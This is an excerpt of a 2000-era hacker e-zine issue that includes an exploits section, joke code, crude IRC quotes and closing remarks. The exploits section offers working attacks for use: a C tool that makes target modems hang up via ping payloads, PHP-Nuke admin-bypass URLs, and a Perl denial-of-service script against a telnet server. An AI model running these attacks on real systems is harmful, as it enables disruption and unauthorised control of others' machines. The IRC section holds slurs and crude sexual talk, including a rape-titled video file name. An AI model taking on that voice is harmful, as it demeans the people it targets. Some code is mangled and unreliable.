b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [18:. - [ warez, exploits and 0day code ] [various gimps] :. ] [various-gimps@b0g.org] :. ] ____________________________________________________________________ /* sour 20/8/2ooo * * * hexmod.c version 0.0.1 * Coded by sour * Touched up by niffum * * About: simple script that plays around with SOME other dialup * modems. YES this has been known for a long time, i just decided * to add some more nice features. * Cheers to niffum for the hex modifications, moono for some of the * code, and phase5 for the wakeup calls every 2 hours of the night. * * Usage: gcc -o modhex modhex.c * * Note : with Type 8 (Custom) make sure that you dont exceed the 16 * character limit, unfortunately we can only play with 16 characters * which is kinda hard to keep under. You can however, write to the * modems memory using the &W for write. I have made it easyer for you * so you just do ./modhex 8 +++ATH0ATDT000 ip.ip.ip.ip, have fun. * * Type 1 +++ATH0 - Tested and working * Type 2 +++ATL3M2O0 - Tested and working * Type 3 +++ATM1O0 - Tested and working * Type 4 +++AT&N1O0 - Not Tested * Type 5 +++AT&N0O0 - Not Tested * Type 6 +++AT%K0O0 - Not Tested * Type 7 +++AT%K0O1 - Not Tested * Type 8 Your very own - Tested and working * * sour@spanner.net * * */ #include int main(int argc, char *argv[]) { char badping[200]; char custom[10]; if (argc != 3) { if ((argc == 4) && (strcmp(argv[1],"8") == 0)) { int n, i=0; char output[strlen(argv[3])*2+1]; for(n=0; n [custom pattern] \n\n", argv[0]); printf ("\t\tType 1 - Disconnects modem\n"); printf ("\t\tType 2 - Make elite noises\n"); printf ("\t\tType 3 - Stop elite noises\n"); printf ("\t\tType 4 - Bring modem down to 300bps\n"); printf ("\t\tType 5 - Bring modem back to Normal\n"); printf ("\t\tType 6 - Disable Data compression\n"); printf ("\t\tType 7 - Enable Data compression\n"); printf ("\t\tType 8 - Custom, Have your own pattern\n\n"); exit (0); } else { if (strcmp(argv[1],"1") == 0) { printf ("\nDisconnecting %s with \n\n", argv[2]); sprintf(badping, "ping -c 5 -p 2b2b2b415448300d %s", argv[2]); system(badping); exit (0); } else if (strcmp(argv[1],"2") == 0) { printf ("\nMaking %s play some funky tunes\n\n", argv[2]); sprintf(badping,"ping -c 2 -p 2b2b2b41544c334d324f300d %s", argv[2]); system(badping); exit (0); } else if (strcmp(argv[1],"3") == 0) { printf ("\nTurning %s's funky tunes off, But why?\n\n", argv[2]); sprintf(badping,"ping -c 2 -p 2b2b2b41544d314f300d %s", argv[2]); system(badping); exit (0); } else if (strcmp(argv[1],"4") == 0) { printf ("\nLets bring %s down to 300bps\n\n", argv[2]); sprintf(badping,"ping -c 2 -p 2b2b2b4154264e314f30 %s", argv[2]); system(badping); exit (0); } else if (strcmp(argv[1],"5") == 0) { printf ("\nTurning %s's Back to normal. But why?\n\n", argv[2]); sprintf(badping,"ping -c 2 -p 2b2b2b4154264e314f30 %s", argv[2]); system(badping); exit (0); } else if (strcmp(argv[1],"6") == 0) { printf ("\nTurning off %s's Data Compression\n\n", argv[2]); sprintf(badping,"ping -c 2 -p 2b2b2b4154254b304f30 %s", argv[2]); system(badping); exit (0); } else if (strcmp(argv[1],"7") == 0) { printf ("\nBringing %s's Data Compression back too normal\n\n", argv[2]); sprintf(badping,"ping -c 2 -p 2b2b2b4154254b304f31 %s", argv[2]); system(badping); exit (0); } else { perror ("Error has occured.\n"); exit (0); } } return 0; } b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! This is the life cycle of a hello world program, and also that of its programmer High School/Jr.High 10 PRINT "HELLO WORLD" 20 END First year in College program Hello(input, output) begin writeln('Hello World') end. Senior year in College (defun hello (print (cons 'Hello (list 'World)))) New professional #include void main(void) { char *message[] = {"Hello ", "World"}; int i; for(i = 0; i < 2; ++i) printf("%s", message[i]); printf("\n"); } Seasoned professional #include #include class string { private: int size; char *ptr; public: string() : size(0), ptr(new char('\0')) {} string(const string &s) : size(s.size) { ptr = new char[size + 1]; strcpy(ptr, s.ptr); } ~string() { delete [] ptr; } friend ostream &operator <<(ostream &, const string &); string &operator=(const char *); }; ostream &operator<<(ostream &stream, const string &s) { return(stream << s.ptr); } string &string::operator=(const char *chrs) { if (this != &chrs) { delete [] ptr; size = strlen(chrs); ptr = new char[size + 1]; strcpy(ptr, chrs); } return(*this); } int main() { string str; str = "Hello World"; cout << str << endl; return(0); } Master Programmer [ uuid(2573F8F4-CFEE-101A-9A9F-00AA00342820) ] library LHello { // bring in the master library importlib("actimp.tlb"); importlib("actexp.tlb"); // bring in my interfaces #include "pshlo.idl" [ uuid(2573F8F5-CFEE-101A-9A9F-00AA00342820) ] cotype THello { interface IHello; interface IPersistFile; }; }; [ exe, uuid(2573F890-CFEE-101A-9A9F-00AA00342820) ] module CHelloLib { // some code related header files importheader(); importheader(); importheader(); importheader("pshlo.h"); importheader("shlo.hxx"); importheader("mycls.hxx"); // needed typelibs importlib("actimp.tlb"); importlib("actexp.tlb"); importlib("thlo.tlb"); [ uuid(2573F891-CFEE-101A-9A9F-00AA00342820), aggregatable ] coclass CHello { cotype THello; }; }; #include "ipfix.hxx" extern HANDLE hEvent; class CHello : public CHelloBase { public: IPFIX(CLSID_CHello); CHello(IUnknown *pUnk); ~CHello(); HRESULT __stdcall PrintSz(LPWSTR pwszString); private: static int cObjRef; }; #include #include #include #include #include "thlo.h" #include "pshlo.h" #include "shlo.hxx" #include "mycls.hxx" int CHello::cObjRef = 0; CHello::CHello(IUnknown *pUnk) : CHelloBase(pUnk) { cObjRef++; return; } HRESULT __stdcall CHello::PrintSz(LPWSTR pwszString) { printf("%ws\n", pwszString); return(ResultFromScode(S_OK)); } CHello::~CHello(void) { // when the object count goes to zero, stop the server cObjRef--; if( cObjRef == 0 ) PulseEvent(hEvent); return; } #include #include #include "pshlo.h" #include "shlo.hxx" #include "mycls.hxx" HANDLE hEvent; int _cdecl main( int argc, char* argv[] ) { ULONG ulRef; DWORD dwRegistration; CHelloCF *pCF = new CHelloCF(); hEvent = CreateEvent(NULL, FALSE, FALSE, NULL); // Initialize the OLE libraries CoInitializeEx(NULL, COINIT_MULTITHREADED); CoRegisterClassObject(CLSID_CHello, pCF, CLSCTX_LOCAL_SERVER, REGCLS_MULTIPLEUSE, &dwRegistration); // wait on an event to stop WaitForSingleObject(hEvent, INFINITE); // revoke and release the class object CoRevokeClassObject(dwRegistration); ulRef = pCF->Release(); // Tell OLE we are going away. CoUninitialize(); return(0); } extern CLSID CLSID_CHello; extern UUID LIBID_CHelloLib; CLSID CLSID_CHello = { /* 2573F891-CFEE-101A-9A9F-00AA00342820 */ 0x2573F891, 0xCFEE, 0x101A, { 0x9A, 0x9F, 0x00, 0xAA, 0x00, 0x34, 0x28, 0x20 } }; UUID LIBID_CHelloLib = { /* 2573F890-CFEE-101A-9A9F-00AA00342820 */ 0x2573F890, 0xCFEE, 0x101A, { 0x9A, 0x9F, 0x00, 0xAA, 0x00, 0x34, 0x28, 0x20 } }; #include #include #include #include #include #include "pshlo.h" #include "shlo.hxx" #include "clsid.h" int _cdecl main(int argc, char * argv[] ) { HRESULT hRslt; IHello *pHello; ULONG ulCnt; IMoniker *pmk; WCHAR wcsT[_MAX_PATH]; WCHAR wcsPath[2 * _MAX_PATH]; // get object path wcsPath[0] = '\0'; wcsT[0] = '\0'; if( argc > 1) { mbstowcs(wcsPath, argv[1], strlen(argv[1]) + 1); wcsupr(wcsPath); } else { fprintf(stderr, "Object path must be specified\n"); return(1); } // get print string if(argc > 2) mbstowcs(wcsT, argv[2], strlen(argv[2]) + 1); else wcscpy(wcsT, L"Hello World"); printf("Linking to object %ws\n", wcsPath); printf("Text String %ws\n", wcsT); // Initialize the OLE libraries hRslt = CoInitializeEx(NULL, COINIT_MULTITHREADED); if(SUCCEEDED(hRslt)) { hRslt = CreateFileMoniker(wcsPath, &pmk); if(SUCCEEDED(hRslt)) if(SUCCEEDED(hRslt)) hRslt = BindMoniker(pmk, 0, IID_IHello, (void **)&pHello); if(SUCCEEDED(hRslt)) { // print a string out pHello->PrintSz(wcsT); Sleep(2000); ulCnt = pHello->Release(); } else printf("Failure to connect, status: %lx", hRslt); // Tell OLE we are going away. CoUninitialize(); } return(0); } Apprentice Hacker #!/usr/local/bin/perl $msg="Hello, world.\n"; if ($#ARGV >= 0) { while(defined($arg=shift(@ARGV))) { $outfilename = $arg; open(FILE, ">" . $outfilename) || die "Can't write $arg: $!\n"; print (FILE $msg); close(FILE) || die "Can't close $arg: $!\n"; } } else { print ($msg); } 1; Experienced Hacker #include #define S "Hello, World\n" main(){exit(printf(S) == strlen(S) ? 0 : 1);} Seasoned Hacker % cc -o a.out ~/src/misc/hw/hw.c % a.out Guru Hacker % cat Hello, world. ^D New Manager 10 PRINT "HELLO WORLD" 20 END Middle Manager mail -s "Hello, world." bob@b12 Bob, could you please write me a program that prints "Hello, world."? I need it by tomorrow. ^D Senior Manager % zmail jim I need a "Hello, world." program by this afternoon. Chief Executive % letter letter: Command not found. % mail To: ^X ^F ^C % help mail help: Command not found. % damn! !: Event unrecognized % logout b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! Disclaimer: I am not responsible for whatever you do with the knowledge you get from reading this advisorie. I am not telling you to go and post messages on sites that use PHP-nuke. Recently there was an advisory on bugtraq about An access validation error that exists in PHP-nuke Web Portal System. With this bug it is possible for a remote user to gain administrative privileges. http://www.target.com/admin.php3?admin=anything The above example lets you login as the administrator. But you cannot do anything with that url alone. When you click on anything in the administrator's control panel you get asked for a username and password. I have found a way to bypass this. http://www.example.com/admin.php3?admin=anything&op=PostAdminStory&introtex t=evil%20hacker%20message The Above example lets you post a topic on the main page as an administrator. You can add html tags to it. And a topic. To seperate the text you want to display you use '%20' without the ''. You could also put html in the message and make the whole front page redirect to some other page. Anyway you get the idea. You can also edit the existing admin accounts by doing: http://www.example.com/admin.php3?admin=anything&op=mod_authors With &op= whatever is in teh administration menu you can control everything that it lets you. I will not go into anything else. I just wanted to show you how to post as an administrator and leave the rest up to you. The patch for this bug is available at: http://www.ncc.org.ve/php- nuke.php3?op=download&location=http://download.sourceforge.net/phpnuke&file =PHP-Nuke-3.0.tar.gz You can post this text on any page as long as you give proper credit to me: Starman_Jones. b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! Subject: *** TOP SECRET MICROSOFT CODE *** Project: Version - Windows 95 Microsoft marketing strategy (MARKET.EXE): #include #include #include /* Microsoft Network Connectivity library */ #include /* For the court of law */ #define say(x) lie(x) #define computeruser ALL_WANT_TO_BUY_OUR_BUGWARE #define next_year soon #define the_product_is_ready_to_ship another_beta_version void main() { if (latest_window_version>one_month_old) { if (there_are_still_bugs) market(bugfix); if (sales_drop_below_certain_point) raise(RUMOURS_ABOUT_A_NEW_BUGLESS_VERSION); } while(everyone_chats_about_new_version) { make_false_promise(it_will_be_multitasking); /* Standard Call, in lie.h */ if (rumours_grow_wilder) make_false_promise(it_will_be_plug_n_play); if (rumours_grow_even_wilder) { market_time=ripe; say("It will be ready in one month); order(programmers, stop_fixing_bugs_in_old_version); order(programmers, start_brainstorm_about_new_version); order(marketingstaff, permission_to_spread_nonsense); vapourware=TRUE; break; } } switch (nasty_questions_of_the_worldpress) { case WHEN_WILL_IT_BE_READY: say("It will be ready in", today+30_days," we're just testing"); break; case WILL_THIS_PLUG_AND_PLAY_THING_WORK: say("Yes it will work"); ask(programmers, why_does_it_not_work); pretend(there_is_no_problem); break; case WHAT_ARE_MINIMAL_HARDWARE_REQUIREMENTS: say("It will run on a 8086 with lightning speed due to" " the 32 bits architecture"); inform(INTEL, "Pentium sales will rise skyhigh"); inform(SAMSUNG, "Start a new memorychip plant" "'cos all those customers will need at least 32 megs"); inform(QUANTUM, "Thanks to our fatware your sales will triple"); get_big_bonus(INTEL, SAMSUNG, QUANTUM); break; case DOES_MICROSOFT_GET_TOO_MUCH_INFLUENCE: say("Oh no, we are just here to make a better world for everyone"); register(journalist, Big_Bill_Book); when(time_is_ripe) { arrest(journalist); brainwash(journalist); when(journalist_says_windows95_is_bugfree) { order(journalist, "write a nice objective article"); release (journalist); } } break; } while (vapourware) { introduction_date++; /* Delay */ if (no_one_believes_anymore_there_will_be_a_release) break; say("It will be ready in",today+ONE_MONTH); } release(beta_version) while (everyone_is_dumb_enough_to_buy_our_bugware) { bills_bank_account += 150*megabucks; release(new_and_even_better_beta_version); introduce(more_memory_requirements); if (customers_report_installation_problems) { say("that is a hardware problem, not a software problem"); if (smart_customer_says_but_you_promised_plug_and_play) { ignore(customer); order(microsoft_intelligence_agency, "Keep an eye on this bastard"); } } if ( bills_bank_account>skyhigh && marriage>two_years ) { divorce(woman_that_was_beatifull_when_I_married_her); wave(dollars, at_lusty_chicks); marry(young_blond_virgin_with_big_boobies); devirginize(young_blond_virgin_with_big_boobies); if (boobies_start_to_hang) dump(young_blond_virgin_with_big_boobies); } if (there_is_another_company) { steal(their_ideas); accuse(compagny, stealing_our_ideas); hire(a_lot_of_lawyers); /* in process.h */ wait(until_other_company_cannot_afford_another_lawsuit); buy_out(other_company); } } /* Now everyone realizes that we sell bugware and they are all angry at us */ order(plastic_surgeon, make_bill_look_like_poor_bastard); buy(nice_little_island); hire(harem); laugh_at(everyone, for_having_the_patience_year_after_year_for_another_unfinished_version); } void bugfix(void) { charge (a_lot_of_money) if (customer_says_he_does_not_want_to_pay_for_bugfix) say("It is not a bugfix but a new version"); if (still_complaints) { ignore(customer); register(customer, big_Bill_book); /* We'll get him when everyone uses Billware!!*/ } } b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! From: grphish To: Subject: MSQL-w3 problem Date: 18 August 2000 23:54 Hello, this is grphish i found out that any user can easily get an xterm with root permissions just by using a simple exploit that exploits w3-MSQL. If your interested in securing it here's the patch: ----- w3-msql.patch --------- 410c410 < scanf("%s ", boundary); --- > scanf("%128s ", boundary); 418c418 < strcat(var, buffer); --- > strncat(var, buffer,sizeof(buffer)); 428c428 < scanf(" Content-Type: %s ", buffer); --- > scanf(" Content-Type: %15360s ", buffer); ------ w3-msql.patch --------- grphish:~# patch w3-msql.c w3-msql.patch grphish:~# ** grphish b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! #!/usr/bin/perl #this exploit is based a subroutine made by Mozillion - thanks people in #perl that helped this thing be made =] - grphish #manson@morphed.net #this exploits the pragmasys telnet server use FileHandle; sub OpenSocket { local($OtherHostname, $Port) = @_; local($OurHostname, $sockaddr, $name, $aliases, $proto, $type, $len, $ThisAddr, $that); local @RemoteHostname = gethostbyname($OtherHostname); $OurHostname = "localhost"; @RemoteHostname || return 0; ($name, $aliases, $proto) = getprotobyname('tcp'); ($name, $aliases, $Port) = getservbyname($Port, 'tcp') unless $Port =~ /^\d+$/; ($name, $aliases, $type, $len, $ThisAddr) = gethostbyname($OurHostname); ($name, $aliases, $type, $len, $OtherHostAddr) = @RemoteHostname; $sockaddr = 'S n a4 x8'; # Format for packed network address $that = pack($sockaddr, &AF_INET, $Port, $OtherHostAddr); $result = socket(S, &PF_INET, &SOCK_STREAM, $proto) || return 0; $result = connect(S, $that) || return 0; S->autoflush(1); # set S to be un-buffered return 1; # success } use Socket; print "Pragmasys telnet server d.o.s attack - grphish\n"; print "Ip: "; $server = <>; $port = "512"; &OpenSocket($server, $port) or die "Connection failed\n"; print S "\0"x100; print "Put in a number to add: "; b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [19:. - [ IRC Quotes ] [k-rad-bob] :. ] [k-rad-bob@b0g.org] :. ] ____________________________________________________________________ well due to the fact that I spent most of this month on vacation its not that big :( also, since the ircops on undernet choose to close #k-rad we are now idling away in #b0g like a few months ago I was driving around with my mom and I saw LINUXGRL on a license plate I was like h0h0! 'follow that car, she is my dream woman' haha i can download the whole internet in less than a minute Why, stryk3r, Wang says.. (_) -=[ me chinese, me play joke, me put peepee in your coke! ] ROTFLMFAO hAhA *bEeP BeEp* bob check out http://www.mysexcams.com/sexcams.html i mean check out http://plebian.com camo some people don't look stupid until they start talking, but this rule doesn't apply to you does it no you loose whore, it doesnt i know people black people I took a 900mhz chip out of a cordless phone thing and jammed it in my computer now it's so fast wh0rde is like 'I'm going to run around with my underpants on my head' and she was like 'I'm going to have your license revoked!@#' any 1 here have any knowledge of how to get a shell from hax0ring <|-eLiTe-|> give me a domain, i'll tell you it's host, and location <|-eLiTe-|> oh, and IP zeal not everyone gets a sticker everytime they sit on a dick. how many you up to now? 327? mormons have good families and shit i learned that from the tv anyone have a current version of winnuke? someone know web page explain how hack bot W and X ? www.howtohackxandwonundernet.org thanx bob Did you masturbate to my article? yes yes I did say gay bob Did you masturbate to my article? yes LOL [Vice_Pope] Open your eyes, k-rad-bob is in THIS chan ! hey dawgyman if something happens 2 seconds ago you dont need to paste the quotes [17:57] (+wh0rde): hey dawgyman [17:57] (+wh0rde): if something happens 2 seconds ago [17:57] (+wh0rde): you dont need to paste the quotes lol gotta go cyas later omg i'm back I have a method to hack the U.S. legal structure right here. Effectively legalizes everything but theft and murder. Is this a good place to advertise? <[PhReAk]> i have a problem, i have an +++ATH0 modem bomber but when i use it it disconnects me from the internet, what is the problem? man, penis rocks somewhone can explain to me how to put a scrypt on a page web pleaze what does it mean to have a drivers license ? what is the port of a Ip of somebody.... always 21,.... or never the same Dawg, ill drop prae for you k-rad-bob, didnt you hear, i am the biggest fucker on earth How do you access the backbone of a Cisco NT server, while the reverse chanrging is set to -"03/} 034 and the box is setup behind 5 wingates and a router, how would the router disable itself leading to leech access to this server/command/fie/drive? ' well if i could get this damn Linux kernel to compile and run under NT and BeOS, maybe they'd stop crashing. [22:54] (@hst): wh0rde had shaggy gear [22:54] (@hst): when he was lil [22:55] (slickrick): EAT MOOSE COCK [22:56] (slickrick): WITH MAYONAISA [22:56] (slickrick): WITH MAYONAISE [22:56] *** wh0rde sets mode: +m [22:56] (@wh0rde): stupid canadians [22:56] (@wh0rde): eat fries [22:56] (@wh0rde): WITH CHEESE AND GRAVY [22:56] *** wh0rde sets mode: -m [22:56] (@C4thY): i think this is a stressful channel [22:56] (@C4thY): where else do ppl come back from idle with random words containing profanities [22:57] (+wh0rde): camo did you finally get the "what do you call a chinese drive by" joke? capachino? [22:57] (+Cam2o): tell me prence, I have a bettery hooked up to my cable modem it makes it fly [23:05] (twoody): hi anyone here [23:05] (@wh0rde): NO [23:05] (@wh0rde): ITS EMPTY [23:06] (@wh0rde): DUMBFUCK [23:06] (twoody): fuck you [23:06] (@wh0rde): PLEASE USE YOUR BRAIN BEFORE ENTERING *MY* DOMAIN AGAIN ... FOR I AM...THE SON OF KRADBOBBYJIMJONES [23:07] (@G|GAWH0RE): what does hst stand for anyways? [23:07] (acidkick): homosexual tendencies [23:07] (@C4thY): high speed turnip [23:07] (f-): high speed technology [23:07] (@wh0rde): HOMO SEXUAL TENDENCIES [23:07] (acidkick): haha [23:07] (f-): heh! [23:07] (@G|GAWH0RE): hyper sensitive titties? [23:07] (+Prence): i whacked off to it all the time [23:08] (+chris`): lol [23:08] (+Prence): like 7yeardadrape.mpg [23:08] (+Cam2o): send me it yo [23:08] (+chris`): rofl [23:08] (+chris`): you sick fucking faggots your mommas so dumb she set her buffer length to a minimal octal instead of puging the cache something is up with my brothers scale it said I weighed way more than I can even concieve his shit has to be broken [22:23] (+Prence`): my parents are watching a movie, and on the movie they are having sex and drinking coronas [22:23] (+wh0rde): porn [22:23] (+wh0rde): o [22:23] (+wh0rde): graphy [22:23] (+Prence`): lol [22:23] (+Prence`): my parents are watching a porn [22:23] (+Prence`): :( [22:24] (+wh0rde): BahahAHAHAHHH%@325235235kn235m23mlnmn235nm23 [22:24] (+Prence`): i think im gonna go join em and whack off [22:24] (+Prence`): brb [22:24] (+Prence`): back [22:24] (+Prence`): i dont last too long when there are lesbians [22:25] (+wh0rde): rotfl [22:25] (+Prence`): heh [22:25] (+wh0rde): arent you the one that their parents were like "OUR BOY IS EXPERIMENTING" [22:25] (+Prence`): lmao [22:25] (+Prence`): ye [22:25] (+Prence`): s [22:25] (+Prence`): =[ [22:26] (+wh0rde): bAHAHAHAH [22:26] (+Prence`): that was scary lol [22:26] (+Prence`): i think my parents are experimenting [22:28] (+Prence`): i like walked in and my mom was on top of my dad, and she rolled off and said what do you want michael? and they were all red and sweaty, and i said uh i dont know and left [22:28] (+Prence`): =[ [22:28] (+wh0rde): asjd;flkasjdf;laskdjf;lasdkj b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [20:. - [: closing words ] [k-rad-bob] :. ] [k-rad-bob@b0g.org] :. ] ____________________________________________________________________ This summer pretty much sucked. Nothing really happened, I didn�t get to go to any cool festivals or anything, and most important, I didn�t get laid! I made a button you guys can use to link our site. Get it at http://www.b0g.org/b0gbutton.gif We�re madly grateful :D I don�t normally check the hosts of the people that visit our site, but I found two cool ones this week: A visitor from tide75.microsoft.com ( was logged twice, starting at 2:24:04 PM on Thursday, August 31, 2000. The initial browser was Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0). This visitor first arrived from www.b0g.org/403.shtml and visited www.b0g.org/index.shtml h0h0! Also: A visitor from test2.tucows.net ( was logged twice, starting at 2:31:19 PM on Wednesday, August 30, 2000. The initial browser was Mozilla/4.75 [en] (X11; U; Linux 2.2.17pre15 i686). This visitor first arrived from search.metacrawler.com pr0n 1-25 and visited www.b0g.org/pr0n.shtml searching for porn or in this case �pr0n� while at work is as leet as you get! Blegah, I got a cold the size of Korea. Remember to send us your articles! Hi�s and hello�s goes out to these peeps: Everyone that has contributed to this b0g issue, anyone that has contributed to any b0g issue, the gimps at packetstorm for mirroring our stuff, mogel and his uber site at http://scene.textfiles.com/ , The guys at hackernews.com, all the guys in FK, cryptic at http://www.digitalaggression.com/ , all our affiliates and the b0g believers, fraggy, acidkick, p0lar, sadarak (for 0wning my ass in unreal) syztrix, people on #efnet that doesnt suck, redpriest, skywalker, all the jail hax0rs, the chick I'm inlove with who hates my guts now, everyone that puts up with the gayness we display in the official b0g channel #b0g on undernet, also on undernet: #hacktech, #gaydogsex (HEH), #hackphreak, #whhs and #gps, cnz, g4wd, the clone and his 0day site at http://nettwerked.net/ , rafay, , anyone that I forgot, anyone that wants to see theyre name here, rfp, wizdumb, c0redump, your m0th3r, cr0bar, pneuma, r3wt, the gimps in irc.blabber.net�s #hack, people who love us, chicks who will have sex with us, chicks with webcams that are going to write b0g propaganda on theyre naked skin and send us pictures at h0h0@b0g.org, you for reading this, and last but not least all my fellow b0g�sters! thats it! Fear! :)))))))))))))))))))))))))))))) b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!